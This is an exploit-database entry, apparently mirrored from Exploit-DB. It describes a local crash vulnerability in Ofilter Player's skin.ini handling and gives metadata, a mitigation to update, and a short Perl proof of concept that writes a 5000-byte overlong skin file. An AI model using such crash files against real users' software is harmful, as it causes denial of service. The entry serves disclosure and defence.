header-logo
Suggest Exploit
vendor:
Ofilter Player
by:
Rehan Ahmed
7,8
CVSS
HIGH
Local Crash
119
CWE
Product Name: Ofilter Player
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WinXP SP2
2020

Ofilter Player (skin.ini) Local Crash PoC

This exploit is a proof of concept for a local crash vulnerability in Ofilter Player. The vulnerability is caused due to a boundary error when handling the skin.ini file, which can be exploited by an attacker to cause a denial of service condition. The vulnerability is confirmed on Windows XP SP2. The exploit creates a file called skin1.ini with a length of 5000 bytes.

Mitigation:

Update to the latest version of Ofilter Player.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#Exploit Title: Ofilter Player (skin.ini) Local Crash PoC
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2

my $boom="\x41" x 5000;
my $file="skin1.ini"; #C:\Program Files\OfilterPlayer\skin
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";

Navigation

Suggest Exploit

Services By CQR